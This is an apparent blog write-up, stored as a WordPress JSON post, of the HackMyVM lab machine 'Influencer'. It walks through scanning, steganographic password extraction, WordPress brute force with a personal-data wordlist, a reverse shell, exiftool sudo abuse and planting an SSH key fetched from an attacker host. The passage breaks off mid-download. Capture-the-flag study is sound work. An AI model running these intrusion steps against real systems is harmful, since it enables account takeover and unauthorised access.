{"id":655,"date":"2024-04-28T20:39:51","date_gmt":"2024-04-28T12:39:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=655"},"modified":"2024-04-28T20:39:51","modified_gmt":"2024-04-28T12:39:51","slug":"hmv-_-influencer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/655\/04\/28\/2024\/","title":{"rendered":"hmv[-_-]Influencer"},"content":{"rendered":"<h1>Influencer<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037343.png\" alt=\"image-20240428124106064\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037344.png\" alt=\"image-20240428185102757\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ rustscan -a 192.168.0.139 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.139:80\nOpen 192.168.0.139:2121\n\nPORT     STATE SERVICE REASON  VERSION\n80\/tcp   open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: OPTIONS HEAD GET POST\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n2121\/tcp open  ftp     syn-ack vsftpd 3.0.5\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 0        0           11113 Jun 09  2023 facebook.jpg\n| -rw-r--r--    1 0        0           35427 Jun 09  2023 github.jpg\n| -rw-r--r--    1 0        0           88816 Jun 09  2023 instagram.jpg\n| -rw-r--r--    1 0        0           27159 Jun 09  2023 linkedin.jpg\n| -rw-r--r--    1 0        0              28 Jun 08  2023 note.txt\n|_-rw-r--r--    1 0        0          124263 Jun 09  2023 snapchat.jpg<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.139\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.139\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status 
codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 10671]\n\/.php                 (Status: 403) [Size: 278]\n\/wordpress            (Status: 301) [Size: 318] [--&gt; http:\/\/192.168.0.139\/wordpress\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139 | html2text\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100 10671  100 10671    0     0  4249k      0 --:--:-- --:--:-- --:--:-- 5210k\n[Ubuntu Logo]\n Apache2 Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Ubuntu systems. It is based on the\nequivalent page on Debian, from which the Ubuntu Apache packaging is derived.\nIf you can read this page, it means that the Apache HTTP server installed at\nthis site is working properly. 
You should replace this file (located at \/var\/\nwww\/html\/index.html) before continuing to operate your HTTP server.\nIf you are a normal user of this web site and don&#039;t know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site&#039;s administrator.\nConfiguration Overview\nUbuntu&#039;s Apache2 default configuration is different from the upstream default\nconfiguration, and split into several files optimized for interaction with\nUbuntu tools. The configuration system is fully documented in \/usr\/share\/doc\/\napache2\/README.Debian.gz. Refer to this for the full documentation.\nDocumentation for the web server itself can be found by accessing the manual if\nthe apache2-doc package was installed on this server.\nThe configuration layout for an Apache2 web server installation on Ubuntu\nsystems is as follows:\n\/etc\/apache2\/<\/code><\/pre>\n<p>It is just the default page, so explore further.<\/p>\n<h3>Sensitive Port Services<\/h3>\n<p>Log in anonymously.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ftp 192.168.0.139 2121                \nConnected to 192.168.0.139.\n220 (vsFTPd 3.0.5)\nName (192.168.0.139:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||16523|)\n150 Here comes the directory listing.\ndr-xr-xr-x    2 1000     65534        4096 Jun 09  2023 .\ndr-xr-xr-x    2 1000     65534        4096 Jun 09  2023 ..\n-rw-r--r--    1 0        0           11113 Jun 09  2023 facebook.jpg\n-rw-r--r--    1 0        0           35427 Jun 09  2023 github.jpg\n-rw-r--r--    1 0        0           88816 Jun 09  2023 instagram.jpg\n-rw-r--r--    
1 0        0           27159 Jun 09  2023 linkedin.jpg\n-rw-r--r--    1 0        0              28 Jun 08  2023 note.txt\n-rw-r--r--    1 0        0          124263 Jun 09  2023 snapchat.jpg\n226 Directory send OK.\nftp&gt; mget *.*\nmget facebook.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||26191|)\n150 Opening BINARY mode data connection for facebook.jpg (11113 bytes).\n100% |***********************************************************************************************************| 11113      634.68 KiB\/s    00:00 ETA\n226 Transfer complete.\n11113 bytes received in 00:00 (618.66 KiB\/s)\nmget github.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||15369|)\n150 Opening BINARY mode data connection for github.jpg (35427 bytes).\n100% |***********************************************************************************************************| 35427       39.28 MiB\/s    00:00 ETA\n226 Transfer complete.\n35427 bytes received in 00:00 (28.90 MiB\/s)\nmget instagram.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||56348|)\n150 Opening BINARY mode data connection for instagram.jpg (88816 bytes).\n100% |***********************************************************************************************************| 88816        2.38 MiB\/s    00:00 ETA\n226 Transfer complete.\n88816 bytes received in 00:00 (2.35 MiB\/s)\nmget linkedin.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||16758|)\n150 Opening BINARY mode data connection for linkedin.jpg (27159 bytes).\n100% |***********************************************************************************************************| 27159        1.40 MiB\/s    00:00 ETA\n226 Transfer complete.\n27159 bytes received in 00:00 (1.37 MiB\/s)\nmget note.txt [anpqy?]? 
\n229 Entering Extended Passive Mode (|||22962|)\n150 Opening BINARY mode data connection for note.txt (28 bytes).\n100% |***********************************************************************************************************|    28        0.94 KiB\/s    00:00 ETA\n226 Transfer complete.\n28 bytes received in 00:00 (0.92 KiB\/s)\nmget snapchat.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||8797|)\n150 Opening BINARY mode data connection for snapchat.jpg (124263 bytes).\n100% |***********************************************************************************************************|   121 KiB    2.44 MiB\/s    00:00 ETA\n226 Transfer complete.\n124263 bytes received in 00:00 (2.42 MiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>Then check whether anything is hidden in the files:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ls -la\ntotal 300\ndrwxr-xr-x  2 kali kali   4096 Apr 28 06:55 .\ndrwxr-xr-x 81 kali kali   4096 Apr 28 06:48 ..\n-rw-r--r--  1 kali kali  11113 Jun  9  2023 facebook.jpg\n-rw-r--r--  1 kali kali  35427 Jun  9  2023 github.jpg\n-rw-r--r--  1 kali kali  88816 Jun  9  2023 instagram.jpg\n-rw-r--r--  1 kali kali  27159 Jun  9  2023 linkedin.jpg\n-rw-r--r--  1 kali kali     28 Jun  8  2023 note.txt\n-rw-r--r--  1 kali kali 124263 Jun  9  2023 snapchat.jpg\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ cat note.txt \n- Change wordpress password\n\n........\ntry and try\n........\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt snapchat.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;&quot;\n[i] Original filename: &quot;backup.txt&quot;.\n[i] Extracting to &quot;snapchat.jpg.out&quot;.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ 
cat snapchat.jpg.out \nPASSWORD BACKUP\n---------------\n\nu3jkeg97gf<\/code><\/pre>\n<p>So start trying from the last file!<\/p>\n<h3>Blog Directory<\/h3>\n<p>A <code>wordpress<\/code> directory was found; take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139\/wordpress\/ -s | html2text | uniq\n\nSkip_to_content\n\n***** Breaking *****\n\u00c2\u00a1Hello_world!\n****** My_new_blog! ******\n\n****** My_new_blog! ******\n\n    * Home\n   \u2070\n\nTest\n*** \u00c2\u00a1Hello_world! ***\nluna\n  Jun_8,_2023  1_Comments\nMy name is Luna Shine, and I am thrilled to share my passion for fashion with\nall of you. Born on June 24, 1997, I have dedicated my life to\u2026\n\nSearch\n[Unknown INPUT type]Search\n***** Entradas recientes *****\n    * \u00c2\u00a1Hello_world!\n***** Comentarios recientes *****\n   1. Admin on \u00c2\u00a1Hello_world!\n***** Archivos *****\n    * June_2023\n***** Categor\u00c3\u00adas *****\n    * Test\n\n***** You Missed *****\n>\nTest\n*** \u00c2\u00a1Hello_world! 
***\n\nMy_new_blog!\nCopyright \u00a9 All rights reserved  |  BlogArise by Themeansar.\n\n Search for: [Unknown INPUT type]  [Search]<\/code><\/pre>\n<p>This gives the user <code>Luna Shine<\/code>, birthday <code>6,24,1997<\/code>. Scan it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ whatweb http:\/\/192.168.0.139\/wordpress\/                \nhttp:\/\/192.168.0.139\/wordpress\/ [200 OK] Apache[2.4.52], Bootstrap[6.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.139], JQuery[3.7.1], MetaGenerator[WordPress 6.5.2], Script[text\/javascript], Title[My new blog!], UncommonHeaders[link], WordPress[6.5.2]<\/code><\/pre>\n<p>That looks right, so run a <code>wpscan<\/code> scan:<\/p>\n<h4>User Scan<\/h4>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u --api-token xxxxxxxx<\/code><\/pre>\n<pre><code class=\"language-bash\">[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n |  Rss Generator (Passive Detection)\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<h4>Plugin Scan<\/h4>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/192.168.0.139\/wordpress\/ -e p --api-token xxxxxxxx<\/code><\/pre>\n<pre><code class=\"language-text\">[+] Enumerating Most Popular Plugins (via Passive Methods)\n\n[i] No plugins Found.<\/code><\/pre>\n<p>No plugins...<\/p>\n<h4>SQL Injection<\/h4>\n<p>First capture a request:<\/p>\n<pre><code class=\"language-bash\">POST 
\/wordpress\/wp-login.php HTTP\/1.1\nHost: 192.168.0.139\nContent-Length: 117\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.139\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.139\/wordpress\/wp-login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=0epcnghs4sn67tv9sao8bni1li\nConnection: close\n\nlog=admin&amp;pwd=password&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2F192.168.0.139%2Fwordpress%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n<p>Tried injection, but:<\/p>\n<pre><code class=\"language-text\">[CRITICAL] all tested parameters do not appear to be injectable.<\/code><\/pre>\n<p>.....<\/p>\n<h4>Keep Trying<\/h4>\n<p>Tried the password <code>u3jkeg97gf<\/code> found earlier, but it failed, so try brute forcing with a custom wordlist:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i \n ___________ \n   cupp.py!                 # Common\n      \\                     # User\n       \\   ,__,             # Passwords\n        \\  (oo)____         # Profiler\n           (__)    )\\   \n              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]\n                            [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don&#039;t know all the info, just hit enter when asked! 
;)\n\n> First Name: luna\n> Surname: shine\n> Nickname: \n> Birthdate (DDMMYYYY): 24061997\n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child&#039;s name: \n> Child&#039;s nickname: \n> Child&#039;s birthdate (DDMMYYYY): \n\n> Pet&#039;s name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: \n> Do you want to add special chars at the end of words? Y\/[N]: \n> Do you want to add some random numbers at the end of words? Y\/[N]:\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to luna.txt, counting 2778 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with luna.txt and shoot! Good luck!<\/code><\/pre>\n<p>Try the brute force:<\/p>\n<pre><code>\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u -P \/home\/kali\/cupp\/luna.txt --api-token xxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n |  Rss Generator (Passive Detection)\n |  Wp Json Api (Aggressive Detection)\n |   - 
http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] Performing password attack on Wp Login against 1 user\/s\n[SUCCESS] - luna \/ luna_1997                                                                                                                            \nTrying luna \/ luna_1997 Time: 00:00:38 &lt;=================================                                          &gt; (2280 \/ 5058) 45.07%  ETA: ??:??:??\n[!] Valid Combinations Found:\n | Username: luna, Password: luna_1997<\/code><\/pre>\n<h3>Uploading a Reverse Shell<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037345.png\" alt=\"image-20240428195122047\" \/><br \/>\n<img 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037346.png\" alt=\"image-20240428195224927\" \/><\/p>\n<p>Try writing it in:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037347.png\" alt=\"image-20240428195425991\" \/><\/p>\n<p>Tried requesting an arbitrary directory to trigger the reverse shell, but it did not trigger, so switched to one that is accessible to trigger it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037348.png\" 
alt=\"image-20240428200224464\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037350.png\" alt=\"image-20240428200239640\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@influencer:\/$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@influencer:\/$ ls -la\ntotal 2097228\ndrwxr-xr-x  19 root root       4096 Jun  8  2023 .\ndrwxr-xr-x  19 root root       4096 Jun  8  2023 ..\nlrwxrwxrwx   1 root root          7 Feb 17  2023 bin -&gt; usr\/bin\ndrwxr-xr-x   4 root root       4096 Jun  8  2023 boot\ndrwxr-xr-x  20 root root       4080 Apr 28 10:49 dev\ndrwxr-xr-x 101 root root       4096 Jun 10  2023 etc\ndrwxr-xr-x   4 root root       4096 Jun  8  2023 home\nlrwxrwxrwx   1 root root          7 Feb 17  2023 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root          9 Feb 17  2023 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root          9 Feb 17  2023 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root         10 Feb 17  2023 libx32 -&gt; usr\/libx32\ndrwx------   2 root root   
   16384 Jun  8  2023 lost+found\ndrwxr-xr-x   2 root root       4096 Feb 17  2023 media\ndrwxr-xr-x   2 root root       4096 Feb 17  2023 mnt\ndrwxr-xr-x   2 root root       4096 Feb 17  2023 opt\ndr-xr-xr-x 176 root root          0 Apr 28 10:49 proc\ndrwx------   6 root root       4096 Jun 10  2023 root\ndrwxr-xr-x  32 root root        900 Apr 28 11:25 run\nlrwxrwxrwx   1 root root          8 Feb 17  2023 sbin -&gt; usr\/sbin\ndrwxr-xr-x   6 root root       4096 Feb 17  2023 snap\ndrwxr-xr-x   3 root root       4096 Jun  8  2023 srv\n-rw-------   1 root root 2147483648 Jun  8  2023 swap.img\ndr-xr-xr-x  13 root root          0 Apr 28 10:49 sys\ndrwxrwxrwt   2 root root       4096 Apr 28 11:02 tmp\ndrwxr-xr-x  14 root root       4096 Feb 17  2023 usr\ndrwxr-xr-x  14 root root       4096 Jun  8  2023 var\n(remote) www-data@influencer:\/$ cat \/etc\/passwd | grep &#039;sh&#039;\nroot:x:0:0:root:\/root:\/bin\/bash\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nluna:x:1000:1000:Luna Shine:\/home\/luna:\/bin\/bash\njuan:x:1001:1001:juan,,,:\/home\/juan:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\n(remote) www-data@influencer:\/$ cd \/home\n(remote) www-data@influencer:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  4 root root 4096 Jun  8  2023 .\ndrwxr-xr-x 19 root root 4096 Jun  8  2023 ..\ndrwx------  2 juan juan 4096 Jun  9  2023 juan\ndrwx------  4 luna luna 4096 Jun  9  2023 luna\n(remote) www-data@influencer:\/home$ cd juan\nbash: cd: juan: Permission denied\n(remote) www-data@influencer:\/home$ cd luna\/\nbash: cd: luna\/: Permission denied\n(remote) www-data@influencer:\/home$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/19361\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1891\/usr\/bin\/chfn\n\/snap\/core20\/1891\/usr\/bin\/chsh\n\/snap\/core20\/1891\/usr\/bin\/gpasswd\n\/snap\/core20\/1891\/usr\/bin\/mount\n\/snap\/core20\/1891\/usr\/bin\/newgrp\n\/snap\/core20\/1891\/usr\/bin\/passwd\n\/snap\/core20\/1891\/usr\/bin\/su\n\/snap\/core20\/1891\/usr\/bin\/sudo\n\/snap\/core20\/1891\/usr\/bin\/umount\n\/snap\/core20\/1891\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1891\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1822\/usr\/bin\/chfn\n\/snap\/core20\/1822\/usr\/bin\/chsh\n\/snap\/core20\/1822\/usr\/bin\/gpasswd\n\/snap\/core20\/1822\/usr\/bin\/mount\n\/snap\/core20\/1822\/usr\/bin\/newgrp\n\/snap\/core20\/1822\/usr\/bin\/passwd\n\/snap\/core20\/1822\/usr\/bin\/su\n\/snap\/core20\/1822\/usr\/bin\/sudo\n\/snap\/core20\/1822\/usr\/bin\/umount\n\/snap\/core20\/1822\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1822\/usr\/lib\/openssh\/ssh-keysign\n(remote) www-data@influencer:\/home$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/bin\/mtr-packet cap_net_raw=ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/snap\/core20\/1891\/usr\/bin\/ping cap_net_raw=ep\n\/snap\/core20\/1822\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@influencer:\/home$ ss -atlp\nState            Recv-Q           Send-Q                       Local Address:Port                         Peer Address:Port           Process           
\nLISTEN           0                4096                         127.0.0.53%lo:domain                            0.0.0.0:*                                \nLISTEN           0                128                              127.0.0.1:1212                              0.0.0.0:*                                \nLISTEN           0                32                                 0.0.0.0:iprop                             0.0.0.0:*                                \nLISTEN           0                80                               127.0.0.1:mysql                             0.0.0.0:*                                \nLISTEN           0                511                                      *:http                                    *:*                                \n(remote) www-data@influencer:\/home$ nc 0.0.0.0 1212\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\n^C<\/code><\/pre>\n<h3>Switching to luna and Escalating to juan<\/h3>\n<p>Try switching users to see whether a password was reused:<\/p>\n<pre><code class=\"language-bash\">luna_1997\nu3jkeg97gf<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037351.png\" alt=\"image-20240428200926934\" \/><\/p>\n<pre><code class=\"language-bash\">luna@influencer:~$ sudo -l\nMatching Defaults entries for 
luna on influencer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser luna may run the following commands on influencer:\n    (juan) NOPASSWD: \/usr\/bin\/exiftool<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/exiftool\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/exiftool\/#sudo<\/a><\/p>\n<p>Try to read and write <code>juan<\/code>&#039;s <code>SSH private key<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037352.png\" alt=\"image-20240428201451831\" \/><\/p>\n<pre><code class=\"language-bash\">luna@influencer:~$ cd \/tmp\nluna@influencer:\/tmp$ touch id_rsa\nluna@influencer:\/tmp$ sudo \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n[sudo] password for luna: \nsudo: a password is required\nluna@influencer:\/tmp$ sudo -u juan \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n======== id_rsa\nExifTool Version Number         : 12.40\nFile Name                       : id_rsa\nDirectory                       : .\nFile Size                       : 0 bytes\nFile Modification Date\/Time     : 2024:04:28 12:15:57+00:00\nFile Access Date\/Time           : 2024:04:28 12:15:57+00:00\nFile Inode Change Date\/Time     : 2024:04:28 
12:15:57+00:00\nFile Permissions                : -rw-rw-r--\nError                           : File is empty\nError: File not found - \/home\/juan\/.ssh\/id_rsa\n    1 image files read\n    1 files could not be read<\/code><\/pre>\n<p>Hmm, it does not exist. Try adding one instead; first generate a key pair locally.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Influencer\/juan\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Influencer\/juan\nYour public key has been saved in \/home\/kali\/temp\/Influencer\/juan.pub\nThe key fingerprint is:\nSHA256:\/xMR+gJtJQiy8EhEtszHXYSkcsG5nJDhuiNWojzpqTk kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n| oB+ooo+o.       |\n| *o*o*... . o    |\n|  BoBo.  . + .   |\n| . ++   . + .    |\n|.. .    So . .   |\n|o.+      .. o    |\n|==        .. .   |\n|Eoo        ..    |\n|++          ..   |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.139 - - [28\/Apr\/2024 08:22:18] &quot;GET \/juan HTTP\/1.1&quot; 200 -\n192.168.0.139 - - [28\/Apr\/2024 08:22:22] &quot;GET \/juan.pub HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<p>Try to escalate to the <code>juan<\/code> user:<\/p>\n<pre><code class=\"language-bash\">luna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan\n--2024-04-28 12:22:19--  http:\/\/192.168.0.143:8888\/juan\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 
